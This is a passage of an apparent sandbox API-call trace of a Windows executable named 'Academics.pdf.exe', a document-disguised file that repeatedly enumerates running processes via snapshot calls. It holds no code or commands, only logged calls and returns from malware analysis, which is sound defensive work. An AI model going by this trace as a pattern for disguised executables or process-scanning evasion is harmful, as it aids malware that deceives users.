lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0282.328] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.331] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0282.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0282.334] CloseHandle (hObject=0x294) returned 1 [0282.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0282.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0282.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0282.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0282.334] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0282.334] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0282.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0282.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0282.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0282.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0282.335] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0282.337] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.338] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.339] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0282.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0282.344] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0282.345] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0282.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.351] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.352] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.353] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.354] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0282.356] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.357] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.357] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0282.358] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0282.359] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0282.360] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0282.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.363] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0282.364] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0282.365] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0282.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0282.367] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0282.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0282.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0282.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0282.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0282.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0282.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0282.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0282.376] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0282.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0282.378] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0282.380] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0282.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0282.382] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0282.383] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0282.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0282.386] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0282.388] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.389] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0282.390] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0282.391] CloseHandle (hObject=0x294) returned 1 [0282.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0282.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0282.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0282.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0282.392] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0282.392] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0282.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0282.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0282.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0282.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0282.392] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0282.395] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.397] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.398] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.399] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.400] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.400] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0282.403] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0282.404] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0282.405] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0282.406] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.407] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.408] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.409] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0282.411] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.412] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.413] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 